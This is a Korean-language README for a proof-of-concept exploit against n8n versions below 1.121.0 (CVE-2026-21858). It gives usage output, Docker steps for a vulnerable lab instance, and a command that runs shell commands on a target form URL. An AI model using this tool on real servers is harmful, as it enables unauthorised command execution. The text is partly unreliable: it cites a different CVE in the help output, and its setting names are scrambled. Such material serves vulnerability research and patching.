
# CVE-2026-21858 (ni8mare)에 대한 개념 증명 익스플로잇 — n8n 버전 < 1.121.0에 영향
n8n은 오픈소스 워크플로 자동화 플랫폼입니다. 1.65.0부터 1.121.0 미만 버전에서는 공격자가 특정 양식 기반 워크플로를 실행하여 기본 서버의 파일에 접근할 수 있습니다. 취약한 워크플로는 인증되지 않은 원격 공격자에게 접근 권한을 부여하여 시스템에 저장된 민감한 정보가 노출될 수 있으며, 배포 구성 및 워크플로 사용 방식에 따라 추가적인 침해가 가능할 수 있습니다. 이 문제는 1.121.0 버전에서 수정되었습니다.
https://nvd.nist.gov/vuln/detail/CVE-2026-21858
❯ python CVE-2026-21858.py -h
usage: CVE-2026-21858.py [-h] --command COMMAND form
PoC exploit: CVE-2026-1357
positional arguments:
form Target form URL
options:
-h, --help show this help message and exit
--command COMMAND Command to run on target
이 PoC는 간단한 파일 변환 흐름을 모의하기 위해 기본적인 n8n 워크플로를 대상으로 작성되었습니다:

저장소를 클론하고 취약한 docker 인스턴스를 생성합니다:
mkdir n8n-data
sudo chown -R 1000:1000 n8n-data
docker-compose up -d
인스턴스가 생성되면 위 스크린샷에 표시된 워크플로를 만듭니다. Extract from File 단계에서는 워크플로가 완료될 수 있도록 설정을 으로 지정해야 합니다. 또한 도구 모음에서 흐름을 로 설정합니다.
On ErrorContineActive흐름을 만든 후 요구 사항을 설치하고 익스플로잇을 실행합니다:
pip install -r requirements.txt
python CVE-2026-21858.py http://localhost:5678/form/1d6de4f6-23dc-4163-ad39-a69252189d5e --command "uname -a"

이 프로젝트는 교육 및 연구 목적으로만 제공됩니다. 작성자는 이 코드로 인한 오용이나 손해에 대해 책임을 지지 않습니다.